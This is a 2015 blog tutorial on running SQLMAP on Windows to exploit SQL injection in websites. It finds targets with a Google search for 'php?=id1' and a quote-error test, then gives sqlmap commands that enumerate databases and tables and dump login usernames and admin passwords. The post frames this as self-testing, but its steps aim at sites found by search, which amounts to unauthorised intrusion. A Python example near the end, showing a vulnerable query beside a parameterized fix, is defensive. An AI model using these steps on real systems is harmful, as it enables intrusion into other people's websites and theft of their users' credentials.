
SQLMAP – How to hack a Website’s SQL tables on Windows

29/12/2015

SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website. The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and Kali.

Test all your websites with SQLMAP to ensure that they are not vulnerable.  It is simply essential that you test all your websites using this tool.

Step 1 – Download Python for Windows

https://www.python.org/downloads/release/python-2710/

Step 2 – Download SQLMAP for Windows

http://sqlmap.org/

Install to C:/SQLMAP

 


 

Step 3 – Find a vulnerable website

Use Google.  Search for the term

php?=id1

Browse to the website and then put a single dash at the end of the url.

so it reads php?=id1′

If you get an error, the website is vulnerable. Part of EU data protection could include a test or attack against the SQL databases.

 

Step 4 – Run SQLMAP Wizard on Windows

Open a cmd prompt.

cd c:\SQLMAP

dir

Look for a second sqlmap-project-sqlmap-xxxx directory.

cd sqlmap-project-sqlmap-xxxx

Here you’ll see sqlmap.py listed. This is the Python script to be run.


sqlmap.py --wizard


Select Target Website – including the id=1


Select Injection Difficulty  (default)

Go for defaults to start off with.


Select Enumeration level

Full enumeration of the database would be level 3, as shown.

Step 5 – ATTACK CODES

SQLMAP will report the OS used first – regardless of what attack code is used.


How do we extract all databases?

http://www.website.com/page.php?id=1 --dbs

Look for how many databases there are, and how many tables!!

 

****

How do we extract Tables?

http://www.website.com/page.php?id=1 -D www --tables

Did you see all the TABLES on the website list out?

Look for likely targets, e.g. a login, username or password table.

Here we find 11 tables.

[Screenshot: sqlmap reports 11 tables on 2 databases]

 

Now that we can read the tables, we can start to dump the data out.

*****

How do we get usernames?

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump

Look for “admin”

*****

How to get all the Login details?

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

 

*****

Step 6 – Get Passwords (of Admin)

http://www.website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump

****

SQLMAP should be used against all your websites.

The last thing you want is someone to steal your entire database.
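Why the quote test in Step 3 produces an error on a vulnerable page, and the code change that stops it, shown as an added example that is not part of the original post. It assumes a Python handler backed by an in-memory SQLite database; the table, the sample row and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Home')")
    return db

def get_page_vulnerable(db, raw_id):
    # The pattern sqlmap detects: the id parameter is pasted into the SQL text,
    # so whatever the visitor types is parsed as part of the query.
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def get_page_hardened(db, raw_id):
    # 1) Validate: id must be an integer; anything else is rejected up front
    #    (a real handler would answer with HTTP 400 here).
    try:
        page_id = int(raw_id)
    except ValueError:
        return None
    # 2) Bind the value as a parameter so it is never parsed as SQL.
    row = db.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None

def leaks_sql_error(handler, raw_id):
    # Regression check mirroring Step 3: does a stray quote reach the SQL parser?
    db = make_db()
    try:
        handler(db, raw_id)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    for handler in (get_page_vulnerable, get_page_hardened):
        print(handler.__name__, "- quote causes SQL error:",
              leaks_sql_error(handler, "1'"))
```

Once every query on the site is written like `get_page_hardened`, a rerun of SQLMAP against the same parameter should find nothing to inject into.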

****

Further SQL queries

https://blog.udemy.com/sql-injection-tutorial/

 
